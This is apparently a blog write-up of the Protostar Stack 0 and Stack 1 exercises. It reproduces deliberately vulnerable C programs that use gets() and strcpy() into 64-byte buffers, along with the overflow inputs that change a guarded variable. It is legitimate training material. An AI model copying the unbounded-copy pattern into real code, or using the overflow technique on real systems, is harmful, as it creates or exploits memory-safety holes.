100 lines
2.1 KiB
Markdown
100 lines
2.1 KiB
Markdown
---
|
|
title: "Protostar Exploit Exercises Solutions 0-1"
|
|
layout: post
|
|
category: writeup
|
|
tags: [exploit-exercises, protostar, hacking]
|
|
excerpt: "Walkthrough for Protostar exercises on exploit-exercises.com"
|
|
---
|
|
|
|
# Stack 0
|
|
|
|
Here's what we're given:
|
|
|
|
```
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
#include <stdio.h>
|
|
|
|
int main(int argc, char **argv)
|
|
{
|
|
volatile int modified;
|
|
char buffer[64];
|
|
|
|
modified = 0;
|
|
gets(buffer);
|
|
|
|
if(modified != 0) {
|
|
printf("you have changed the 'modified' variable\n");
|
|
} else {
|
|
printf("Try again?\n");
|
|
}
|
|
}
|
|
```
|
|
|
|
|
|
|
|
The first thing I took note of is the size of the `buffer`: 64 bytes. After that, the program inputs text for `buffer`, and then checks to see if you modified the `modified` variable.
|
|
I'm guessing if I put in a string longer than 64 bytes it will work. Let's see:
|
|
|
|
```
|
|
$ echo `python -c 'print "A"*64'` | ./stack0
|
|
Try again?
|
|
```
|
|
|
|
That works as expected, now with 65 bytes:
|
|
|
|
```
|
|
$ echo `python -c 'print "A"*65'` | ./stack0
|
|
you have changed the 'modified' variable
|
|
```
|
|
|
|
Solved!
|
|
|
|
# Stack 1
|
|
|
|
Here's the code we're given:
|
|
|
|
```
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
int main(int argc, char **argv)
|
|
{
|
|
volatile int modified;
|
|
char buffer[64];
|
|
|
|
if(argc == 1) {
|
|
errx(1, "please specify an argument\n");
|
|
}
|
|
|
|
modified = 0;
|
|
strcpy(buffer, argv[1]);
|
|
|
|
if(modified == 0x61626364) {
|
|
printf("you have correctly got the variable to the right value\n");
|
|
} else {
|
|
printf("Try again, you got 0x%08x\n", modified);
|
|
}
|
|
}
|
|
```
|
|
|
|
Just like Stack 0, we're given a `buffer` array size 64 bytes and we're also asked to input the contents of it. Except it looks like modified has to equal `0x61626364` instead of just changing it like before.
|
|
|
|
Keep in mind this is [little endian](https://en.wikipedia.org/wiki/Endianness), so I'll input the value in reverse order:
|
|
|
|
```
|
|
$ ./stack1 `python -c 'print "A"*64'`
|
|
Try again, you got 0x00000000
|
|
```
|
|
|
|
That works as expected, now with the additional bytes:
|
|
|
|
```
|
|
$ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'`
|
|
you have correctly got the variable to the right value
|
|
```
|
|
|
|
Woo!
|